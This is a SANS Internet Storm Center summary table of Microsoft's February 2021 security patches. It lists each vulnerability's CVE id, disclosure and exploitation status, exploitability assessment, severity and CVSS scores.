.NET Core and Visual Studio Denial of Service Vulnerability | CVE-2021-1721 | Yes | No | Less Likely | Less Likely | Important | 6.5 | 5.9
.NET Framework Denial of Service Vulnerability | CVE-2021-24111 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Azure IoT CLI extension Elevation of Privilege Vulnerability | CVE-2021-24087 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | CVE-2021-24109 | No | No | Less Likely | Less Likely | Moderate | 6.8 | 5.9
Microsoft Dataverse Information Disclosure Vulnerability | CVE-2021-24101 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.9
Microsoft Defender Elevation of Privilege Vulnerability | CVE-2021-24092 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | CVE-2021-1724 | No | No | Less Likely | Less Likely | Important | 6.1 | 5.5
Microsoft Edge for Android Information Disclosure Vulnerability | CVE-2021-24100 | No | No | Less Likely | Less Likely | Important | 5.0 | 4.5
Microsoft Excel Remote Code Execution Vulnerability | CVE-2021-24067 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Excel Remote Code Execution Vulnerability | CVE-2021-24068 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Excel Remote Code Execution Vulnerability | CVE-2021-24069 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Excel Remote Code Execution Vulnerability | CVE-2021-24070 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Microsoft Exchange Server Spoofing Vulnerability | CVE-2021-24085 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7
Microsoft Exchange Server Spoofing Vulnerability | CVE-2021-1730 | No | No | Less Likely | Less Likely | Important | 5.4 | 4.9
Microsoft SharePoint Information Disclosure Vulnerability | CVE-2021-24071 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8
Microsoft SharePoint Remote Code Execution Vulnerability | CVE-2021-24066 | No | No | More Likely | More Likely | Important | 8.8 | 7.7
Microsoft SharePoint Server Remote Code Execution Vulnerability | CVE-2021-24072 | No | No | More Likely | More Likely | Important | 8.8 | 7.7
Microsoft SharePoint Spoofing Vulnerability | CVE-2021-1726 | No | No | Less Likely | Less Likely | Important | 8.0 | 7.0
Microsoft Teams iOS Information Disclosure Vulnerability | CVE-2021-24114 | No | No | Less Likely | Less Likely | Important | 5.7 | 5.0
Microsoft Windows Codecs Library Remote Code Execution Vulnerability | CVE-2021-24081 | No | No | Less Likely | Less Likely | Critical | 7.8 | 7.0
Microsoft Windows VMSwitch Information Disclosure Vulnerability | CVE-2021-24076 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | CVE-2021-24082 | No | No | Less Likely | Less Likely | Important | 4.3 | 3.8
PFX Encryption Security Feature Bypass Vulnerability | CVE-2021-1731 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Package Managers Configurations Remote Code Execution Vulnerability | CVE-2021-24105 | No | No | Less Likely | Less Likely | Important | 8.4 | 7.6
Skype for Business and Lync Denial of Service Vulnerability | CVE-2021-24099 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7
Skype for Business and Lync Spoofing Vulnerability | CVE-2021-24073 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.9
Sysinternals PsExec Elevation of Privilege Vulnerability | CVE-2021-1733 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 7.0
System Center Operations Manager Elevation of Privilege Vulnerability | CVE-2021-1728 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7
Visual Studio Code Remote Code Execution Vulnerability | CVE-2021-1639 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1
Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | CVE-2021-26700 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Address Book Remote Code Execution Vulnerability | CVE-2021-24083 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Backup Engine Information Disclosure Vulnerability | CVE-2021-24079 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Camera Codec Pack Remote Code Execution Vulnerability | CVE-2021-24091 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8
Windows Console Driver Denial of Service Vulnerability | CVE-2021-24098 | Yes | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows DNS Server Remote Code Execution Vulnerability | CVE-2021-24078 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5
Windows DirectX Information Disclosure Vulnerability | CVE-2021-24106 | Yes | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Event Tracing Elevation of Privilege Vulnerability | CVE-2021-24102 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Event Tracing Elevation of Privilege Vulnerability | CVE-2021-24103 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Fax Service Remote Code Execution Vulnerability | CVE-2021-1722 | No | No | Less Likely | Less Likely | Critical | 8.1 | 7.1
Windows Fax Service Remote Code Execution Vulnerability | CVE-2021-24077 | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.5
Windows Graphics Component Remote Code Execution Vulnerability | CVE-2021-24093 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
Windows Installer Elevation of Privilege Vulnerability | CVE-2021-1727 | Yes | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows Kernel Elevation of Privilege Vulnerability | CVE-2021-24096 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Local Spooler Remote Code Execution Vulnerability | CVE-2021-24088 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.7
Windows Mobile Device Management Information Disclosure Vulnerability | CVE-2021-24084 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8
Windows Network File System Denial of Service Vulnerability | CVE-2021-24075 | No | No | Less Likely | Less Likely | Important | 6.8 | 5.9
Windows PKU2U Elevation of Privilege Vulnerability | CVE-2021-25195 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8
Windows Remote Procedure Call Information Disclosure Vulnerability | CVE-2021-1734 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5
Windows TCP/IP Denial of Service Vulnerability | CVE-2021-24086 | No | No | More Likely | More Likely | Important | 7.5 | 6.5
Windows TCP/IP Remote Code Execution Vulnerability | CVE-2021-24074 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5
Windows TCP/IP Remote Code Execution Vulnerability | CVE-2021-24094 | No | No | More Likely | More Likely | Critical | 9.8 | 8.5
Windows Trust Verification API Denial of Service Vulnerability | CVE-2021-24080 | No | No | Less Likely | Less Likely | Moderate | 6.5 | 5.7
Windows Win32k Elevation of Privilege Vulnerability | CVE-2021-1732 | No | Yes | Detected | Detected | Important | 7.8 | 7.2
Windows Win32k Elevation of Privilege Vulnerability | CVE-2021-1698 | No | No | More Likely | More Likely | Important | 7.8 | 6.8

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
9 February 2021

ISC Stormcast For Tuesday, February 9th, 2021 https://isc.sans.edu/podcastdetail.html?id=7364, (Tue, Feb 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.